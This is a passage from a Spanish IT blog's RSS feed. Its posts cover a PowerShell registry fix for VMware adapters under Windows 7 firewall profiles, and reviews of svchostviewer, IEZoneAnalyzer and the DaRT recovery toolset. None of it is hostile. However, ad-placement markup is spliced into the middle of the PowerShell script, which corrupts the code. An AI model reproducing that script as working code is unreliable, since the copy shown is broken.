<br />Filed under: <a href='http://seifreed.com/category/seguridad/'>Seguridad</a>, <a href='http://seifreed.com/category/sistemas-operativos/windows-sistemas-operativos/'>Windows</a> Tagged: <a href='http://seifreed.com/tag/console2/'>Console2</a>, <a href='http://seifreed.com/tag/cygwin/'>Cygwin</a>, <a href='http://seifreed.com/tag/windows/'>windows</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4031/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4031/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4031/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4031/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4031/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4031/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4031/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4031/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4031/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4031/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4031/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4031/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4031/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4031/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=4031&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/01/13/firewall-windows-7-y-cygwin/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://img339.imageshack.us/img339/9411/firewallgeneral.png" medium="image" />

		<media:content url="http://img839.imageshack.us/img839/8476/iniciogk.png" medium="image" />

		<media:content url="http://img18.imageshack.us/img18/5149/saveh.png" medium="image" />
	</item>
		<item>
		<title>Resolviendo el problema de Firewall en Windows VISTA/7 con VMware</title>
		<link>http://seifreed.com/2012/01/12/resolviendo-el-problema-de-firewall-en-windows-vista7-con-vmware/</link>
		<comments>http://seifreed.com/2012/01/12/resolviendo-el-problema-de-firewall-en-windows-vista7-con-vmware/#comments</comments>
		<pubDate>Thu, 12 Jan 2012 18:37:22 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Firewall]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[VMware]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4028</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Cuando me encontraba leyendo el libro de Sergio de los Santos &#8220;Máxima Seguridad en Windows&#8221; sabría que acabaría formateando el ordenador para acabar de instalarlo totálmente seguro y a mi gusto, con las recomendaciones de lo que supone para mi ahora una guía de como configurar un Windows de manera [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=4028&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Cuando me encontraba leyendo el libro de <a href="http://twitter.com/ssantosv">Sergio de los Santos &#8220;Máxima Seguridad en Windows&#8221;</a> sabría que acabaría formateando el ordenador para acabar de instalarlo totálmente seguro y a mi gusto, con las recomendaciones de lo que supone para mi ahora una guía de como configurar un Windows de manera segura y sin antivirus <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> .</p>
<p>Una de las muchas cosas que cambié es el tema del Firewall que viene integrado con Sistema en Windows 7, por defecto en los 3 perfiles, dominio, público y privado todo me basé en listas blancas para permitir la salida de programas hacia la red. Uno de los problemas que tuve es que, me quedé sin conexión a  Internet con VMWare. El problema de VMWare en Windows 7e s que las interfaces de red, vmnet, te las asigna como redes públicas y por lo tanto te quedas sin acceso a Internet.</p>
<p>Una solución para tener conexión a Internet es mediante un script en Power Shell que Windows no asigne las interfaces de red como públicas.</p>
<p><img class="aligncenter" src="http://www.petri.co.il/images/vmware_net_status_1.gif" alt="" width="800" height="600" /></p>
<p>Podemos ver como Windows asigna las interfaces de red como públicas.</p>
<p>Te marca la red como red desconocida</p>
<p><img class="aligncenter" src="http://www.petri.co.il/images/vmware_net_status_2.gif" alt="" width="800" height="600" /></p>
<p>El script en Power Shell es el siguiente:</p>
<blockquote>
<div>
<pre># see &lt;a href="http://msdn2.microsoft.com/en-us/library/bb201634.aspx"&gt;http://msdn2.microsoft.com/en-us/library/bb201634.aspx&lt;/a&gt;
#
# *NdisDeviceType
#
# The type of the device. The default value is zero, which indicates a standard
# networking device that connects to a network.
#
# Set *NdisDeviceType to NDIS_DEVICE_TYPE_ENDPOINT (1) if this device is an
# endpoint device and is not a true network interface that connects to a network.
# For example, you must specify NDIS_DEVICE_TYPE_ENDPOINT for devices such as
# smart phones that use a networking infrastructure to communicate to the local
# computer system but do not provide connectivity to an external network.
#
# Usage: run in an elevated shell (vista/longhorn) or as adminstrator (xp/2003).
#
# PS&amp;gt; .\fix-vmnet-adapters.ps1

# boilerplate elevation check

$identity = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = new-object Security.Principal.WindowsPrincipal $identity
$elevated = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)  

if (-not $elevated) {
    $error = "Sorry, you need to run this script"
    if ([System.Environment]::OSVersion.Version.Major -gt 5) {
        $error += " in an elevated shell."
    } else {
        $error += " as Administrator."
    }
    throw $error
}

function confirm {
$host.ui.PromptForChoice("Continue", "Process adapter?",
[Management.Automation.Host.ChoiceDescription[]]@("&amp;amp;No", "&amp;amp;Yes"), 0) -eq $true
}

&lt;!-- Adkit freestyle placement --&gt;[adkit: zone="freestyle" limit="1" list="0"] &lt;br&gt;&lt;br&gt;&lt;br&gt; [netshelter]# adapters key
pushd 'hklm:\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}' 

# ignore and continue on error
dir -ea 0  | % {
    $node = $_.pspath
    $desc = gp $node -name driverdesc
    if ($desc -like "*vmware*") {
        write-host ("Found adapter: {0} " -f $desc.driverdesc)
        if (confirm) {
new-itemproperty $node -name '*NdisDeviceType' -propertytype dword -value 1
        }
    }
}
popd

# disable/enable network adapters
gwmi win32_networkadapter | ? {$_.name -like "*vmware*" } | % {

# disable
    write-host -nonew "Disabling $($_.name) ... "
    $result = $_.Disable()
    if ($result.ReturnValue -eq -0) { write-host " success." } else { write-host " failed." }
    # enable
    write-host -nonew "Enabling $($_.name) ... "
    $result = $_.Enable()
    if ($result.ReturnValue -eq -0) { write-host " success." } else { write-host " failed." }
}</pre>
</div>
</blockquote>
<p>Este script se ha power shell se ha de ejecutar con Power Shell.</p>
<p><img class="aligncenter" src="http://www.petri.co.il/images/vmware_net_status_5.gif" alt="" width="997" height="640" /></p>
<p>Las redes VMNet se ha de marcar el Y para aplicar la configuración.</p>
<p><img src="http://www.petri.co.il/images/vmware_net_status_3.gif" alt="" width="800" height="600" /></p>
<p>ya tenemos las redes como enabled</p>
<p>Y hasta aquí la solución al problema</p>
<p><a href="http://www.petri.co.il/exclude-vmware-virtual-adapters-vista-2008-network-awareness-windows-firewall.htm">Referencias</a></p>
<p>Saludos!</p>
<br />Filed under: <a href='http://seifreed.com/category/general/'>General</a> Tagged: <a href='http://seifreed.com/tag/firewall/'>Firewall</a>, <a href='http://seifreed.com/tag/seguridad/'>Seguridad</a>, <a href='http://seifreed.com/tag/vmware/'>VMware</a>, <a href='http://seifreed.com/tag/windows/'>windows</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4028/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4028/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4028/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4028/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4028/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4028/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4028/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4028/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4028/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4028/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4028/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4028/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4028/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4028/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=4028&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/01/12/resolviendo-el-problema-de-firewall-en-windows-vista7-con-vmware/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://www.petri.co.il/images/vmware_net_status_1.gif" medium="image" />

		<media:content url="http://www.petri.co.il/images/vmware_net_status_2.gif" medium="image" />

		<media:content url="http://www.petri.co.il/images/vmware_net_status_5.gif" medium="image" />

		<media:content url="http://www.petri.co.il/images/vmware_net_status_3.gif" medium="image" />
	</item>
		<item>
		<title>Svchostviewer, descifra los procesos svchost en Windows</title>
		<link>http://seifreed.com/2011/04/19/svchostviewer-descifra-los-procesos-svchost-en-windows/</link>
		<comments>http://seifreed.com/2011/04/19/svchostviewer-descifra-los-procesos-svchost-en-windows/#comments</comments>
		<pubDate>Tue, 19 Apr 2011 20:27:32 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Sistemas Operativos]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[svchost]]></category>
		<category><![CDATA[svchostviewer]]></category>
		<category><![CDATA[Utilidades]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=3145</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Desde siempre cuando nos hemos dedicado al mantenimiento de sistemas, nos hemos encontrado con los procesos svchost. Nadie a primera vista que son estos procesos. Para poder saber de que se encargan exactamente podemos usar svchostviewer. Svchostviewer está alojado en codeplex, podemos descargarlo de aquí. Cuando lo ejecutamos empieza a [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3145&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Desde siempre cuando nos hemos dedicado al mantenimiento de sistemas, nos hemos encontrado con los procesos svchost. Nadie a primera vista que son estos procesos. Para poder saber de que se encargan exactamente podemos usar svchostviewer.</p>
<p>Svchostviewer está alojado en codeplex, podemos descargarlo de <a href="http://svchostviewer.codeplex.com/">aquí.</a></p>
<p>Cuando lo ejecutamos empieza a recopilar información de nuestro sistema de los procesos svchost</p>
<p><img class="aligncenter" src="http://img853.imageshack.us/img853/7874/svchostviewer.png" alt="" width="800" height="558" /></p>
<p>Aquí podemos ver los diferentes procesos svchost a que se dedican exactamente. Además nos da una descripción de que significa el proceso.</p>
<p>También tenemos dos opciones mas con svchostviewer</p>
<p><img class="aligncenter" src="http://img823.imageshack.us/img823/2387/opcioneszx.png" alt="" width="490" height="241" /></p>
<p>Podemos abrir los servicios de Windows, por si queremos detener o iniciar alguno.</p>
<p>Y también podemos sacar un report de los svchost de la máquina</p>
<p><img class="aligncenter" src="http://img857.imageshack.us/img857/9357/fichero.png" alt="" width="513" height="536" /></p>
<p>Ya tenemos un report de los svchost de la máquina.</p>
<p>Sin duda una aplicación interesante.</p>
<p>Un saludo</p>
<br />Filed under: <a href='http://seifreed.com/category/sistemas-operativos/'>Sistemas Operativos</a>, <a href='http://seifreed.com/category/software/'>Software</a>, <a href='http://seifreed.com/category/sistemas-operativos/windows-sistemas-operativos/'>Windows</a> Tagged: <a href='http://seifreed.com/tag/svchost/'>svchost</a>, <a href='http://seifreed.com/tag/svchostviewer/'>svchostviewer</a>, <a href='http://seifreed.com/tag/utilidades/'>Utilidades</a>, <a href='http://seifreed.com/tag/windows/'>windows</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/3145/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/3145/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/3145/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/3145/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/3145/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/3145/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/3145/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/3145/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/3145/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/3145/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/3145/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/3145/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/3145/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/3145/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3145&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2011/04/19/svchostviewer-descifra-los-procesos-svchost-en-windows/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://img853.imageshack.us/img853/7874/svchostviewer.png" medium="image" />

		<media:content url="http://img823.imageshack.us/img823/2387/opcioneszx.png" medium="image" />

		<media:content url="http://img857.imageshack.us/img857/9357/fichero.png" medium="image" />
	</item>
		<item>
		<title>IEZoneAnalyzer, comprueba la seguridad de tu Internet Explorer</title>
		<link>http://seifreed.com/2011/04/17/iezoneanalyzer-comprueba-la-seguridad-de-tu-internet-explorer/</link>
		<comments>http://seifreed.com/2011/04/17/iezoneanalyzer-comprueba-la-seguridad-de-tu-internet-explorer/#comments</comments>
		<pubDate>Sun, 17 Apr 2011 10:32:25 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Software]]></category>
		<category><![CDATA[IEZoneAnalyzer]]></category>
		<category><![CDATA[Internet Explorer]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Utilidades]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=3136</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Tenemos varias maneras de comprobar la seguridad de Internet Explorer. Hoy os traigo una utilidad de Microsoft para comprobar la seguridad de Internet Explorer e incluso poder exportar los resultados. La utilidad se llama IEZoneAnalyzer Algunas imágenes sobre la utilidad. Desde la utilidad podemos acceder a todas las zonas que hay [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3136&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Tenemos varias maneras de comprobar la seguridad de Internet Explorer. Hoy os traigo una utilidad de Microsoft para comprobar la seguridad de Internet Explorer e incluso poder exportar los resultados.</p>
<p>La utilidad se llama <a class="vt-p" href="https://blogs.technet.com/b/fdcc/archive/2011/04/14/iezoneanalyzer-v3.aspx">IEZoneAnalyzer</a></p>
<p>Algunas imágenes sobre la utilidad.</p>
<p><img class="aligncenter" src="http://img695.imageshack.us/img695/5518/iezoneyzer.png" alt="" width="552" height="561" /></p>
<p>Desde la utilidad podemos acceder a todas las zonas que hay en Internet Explorer.</p>
<p>Ahora por ejemplo, cambiaremos la página de Inicio</p>
<p><img class="aligncenter" src="http://img818.imageshack.us/img818/6650/mapzone.png" alt="" width="555" height="560" /></p>
<p>Ya tenemos la página cambiada en Internet Explorer.</p>
<p>Ahora exportaremos la configuración de una zona, para poder revisar la configuración.</p>
<p><img class="aligncenter" src="http://img705.imageshack.us/img705/4814/efectivesettings.png" alt="" width="796" height="559" /></p>
<p>Ya no hay excusa para volver a configurar la seguridad de Internet Explorer.</p>
<p>Un saludo</p>
<br />Filed under: <a href='http://seifreed.com/category/software/'>Software</a> Tagged: <a href='http://seifreed.com/tag/iezoneanalyzer/'>IEZoneAnalyzer</a>, <a href='http://seifreed.com/tag/internet-explorer/'>Internet Explorer</a>, <a href='http://seifreed.com/tag/microsoft/'>Microsoft</a>, <a href='http://seifreed.com/tag/seguridad/'>Seguridad</a>, <a href='http://seifreed.com/tag/utilidades/'>Utilidades</a>, <a href='http://seifreed.com/tag/windows/'>windows</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/3136/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/3136/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/3136/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/3136/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/3136/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/3136/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/3136/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/3136/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/3136/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/3136/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/3136/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/3136/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/3136/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/3136/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3136&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2011/04/17/iezoneanalyzer-comprueba-la-seguridad-de-tu-internet-explorer/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://img695.imageshack.us/img695/5518/iezoneyzer.png" medium="image" />

		<media:content url="http://img818.imageshack.us/img818/6650/mapzone.png" medium="image" />

		<media:content url="http://img705.imageshack.us/img705/4814/efectivesettings.png" medium="image" />
	</item>
		<item>
		<title>DaRT (Diagnostic And Recovery toolset) II</title>
		<link>http://seifreed.com/2011/04/14/dart-diagnostic-and-recovery-toolset-ii/</link>
		<comments>http://seifreed.com/2011/04/14/dart-diagnostic-and-recovery-toolset-ii/#comments</comments>
		<pubDate>Thu, 14 Apr 2011 05:42:07 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[DaRT]]></category>
		<category><![CDATA[Diagnostic And Recovery toolset]]></category>
		<category><![CDATA[Utilidades]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=3130</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Siguiendo con la entrada de ayer, en la que creábamos la imagen de DaRT, para poder usarla. Grabamos la imagen ISO en un CD y arrancamos desde él. Cuando inciamos el CD, nos pregunta si queremos habilitar conexión de red. En nuestro caso le dado a Yes. Si queremos poder [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3130&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Siguiendo con la entrada de ayer, en la que <a href="http://seifreed.com/2011/04/13/dart-diagnostic-and-recovery-toolset-i/">creábamos la imagen de DaRT</a>, para poder usarla.</p>
<p>Grabamos la imagen ISO en un CD y arrancamos desde él.</p>
<p><img class="aligncenter" src="http://img717.imageshack.us/img717/1716/networkx.png" alt="" width="485" height="213" /></p>
<p>Cuando inciamos el CD, nos pregunta si queremos habilitar conexión de red.</p>
<p>En nuestro caso le dado a Yes.</p>
<p><img class="aligncenter" src="http://img546.imageshack.us/img546/9463/driveletters.png" alt="" width="477" height="217" /></p>
<p>Si queremos poder buscar cosas dentro de nuestro PC local, tendremos que habilitarlo.</p>
<p><img class="aligncenter" src="http://img685.imageshack.us/img685/2038/teclado.png" alt="" width="397" height="281" /></p>
<p>Elegimos la configuración del teclado.</p>
<p><img class="aligncenter" src="http://img5.imageshack.us/img5/1406/recovery.png" alt="" width="437" height="341" /></p>
<p>Como cuando iniciamos un CD de recovery, DaRT buscará las instalaciones existentes en la máquina.</p>
<p><img class="aligncenter" src="http://img833.imageshack.us/img833/6535/recoveryoptions.png" alt="" width="516" height="451" /></p>
<p>Igual que con un CD de recuperación, tenemos las mismas opciones y, además tenemos las opciones ofrecidas por DaRT al final.</p>
<p><img class="aligncenter" src="http://img833.imageshack.us/img833/6535/recoveryoptions.png" alt="" width="516" height="451" /></p>
<p>Elegimos la ultima opción</p>
<p><img class="aligncenter" src="http://img191.imageshack.us/img191/3217/registrocq.png" alt="" width="653" height="558" /></p>
<p>Si necesitamos editar el registro podemos hacerlo desde aquí.</p>
<p><img class="aligncenter" src="http://img849.imageshack.us/img849/6258/explorer.png" alt="" width="650" height="553" /></p>
<p>Tenemos también disponible un explorador de archivos.</p>
<p><img class="aligncenter" src="http://img545.imageshack.us/img545/6546/locksmith.png" alt="" width="647" height="548" /></p>
<p>Como ya hacíamos con ERD Commander o Hirens boot, podíamos cambiar el password de las cuentas de la máquina.</p>
<p><img class="aligncenter" src="http://img638.imageshack.us/img638/868/wizardsolution.png" alt="" width="647" height="545" /></p>
<p>DaRT dispone de un Wizard para solventar algunos problemas con los que nos podamos encontrar.</p>
<p><img class="aligncenter" src="http://img687.imageshack.us/img687/2950/crashyzer.png" alt="" width="646" height="564" /></p>
<p>Con las debugging tools somos capaces de poder analizar los .dump que nos salen cuando ahy un pantallazo azul</p>
<p><img class="aligncenter" src="http://img19.imageshack.us/img19/3553/networkconfiguration.png" alt="" width="647" height="540" /></p>
<p>Como hemos habilitado la red, podríamos asignarle la Ip que quisiéramos aquí.</p>
<p><img class="aligncenter" src="http://img577.imageshack.us/img577/7922/filerestore.png" alt="" width="645" height="536" /></p>
<p>Si hemos perdido algún archivo porque ha sido eliminado por error, podemos intentar recuperarlo.</p>
<p><img class="aligncenter" src="http://img233.imageshack.us/img233/1671/hotfixes.png" alt="" width="641" height="534" /></p>
<p>A veces en entorno corporativo, la instalación de un Hotfix puede provocar un mal funcionamiento de alguna aplicación. Podríamos quitarlo desde aquí.</p>
<p><img class="aligncenter" src="http://img34.imageshack.us/img34/3499/restorembr.png" alt="" width="641" height="537" /></p>
<p>Si nos ocurre que perdemos el gestor de arranque, podemos recuperarlo desde aquí.</p>
<p><img class="aligncenter" src="http://img17.imageshack.us/img17/4885/sfce.png" alt="" width="639" height="539" /></p>
<p>Si por lo que sea necesitamos de reprar los archivos de sistema en Windows podemos usar SFC incluído como utilidad.</p>
<p><img class="aligncenter" src="http://img853.imageshack.us/img853/6711/diskwipe.png" alt="" width="637" height="532" /></p>
<p>Para que no puedan recuperar nuestra información podemos usar esta utilidad y hacer un wipe al disco duro.</p>
<p><img class="aligncenter" src="http://img683.imageshack.us/img683/2716/filesearch.png" alt="" width="634" height="539" /></p>
<p>Si necesitaramos buscar cualquier archivo en la máquina disponemos de un file search</p>
<p><img class="aligncenter" src="http://img834.imageshack.us/img834/2799/computermanagement.png" alt="" width="637" height="530" /></p>
<p>Podemos obtener la información del equipo desde aquí</p>
<p><img class="aligncenter" src="http://img198.imageshack.us/img198/5121/systemupdate.png" alt="" width="747" height="598" /></p>
<p>También tenemos una utilidad para la búsqueda del Malware, además podemos actualizar in situ, para poder encontrar los últimos virus</p>
<p><img class="aligncenter" src="http://img233.imageshack.us/img233/4710/remoteconnections.png" alt="" width="575" height="532" /></p>
<p>Como avisábamos en el POST anterior, comos capaces de habilitar las conexiones remotas.</p>
<p>Y hasta aquí las utilidades disponibles en DaRT.</p>
<p>Un saludo</p>
<br />Filed under: <a href='http://seifreed.com/category/seguridad/'>Seguridad</a>, <a href='http://seifreed.com/category/software/'>Software</a> Tagged: <a href='http://seifreed.com/tag/dart/'>DaRT</a>, <a href='http://seifreed.com/tag/diagnostic-and-recovery-toolset/'>Diagnostic And Recovery toolset</a>, <a href='http://seifreed.com/tag/utilidades/'>Utilidades</a>, <a href='http://seifreed.com/tag/windows/'>windows</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/3130/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/3130/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/3130/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/3130/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/3130/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/3130/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/3130/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/3130/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/3130/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/3130/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/3130/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/3130/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/3130/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/3130/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3130&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2011/04/14/dart-diagnostic-and-recovery-toolset-ii/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
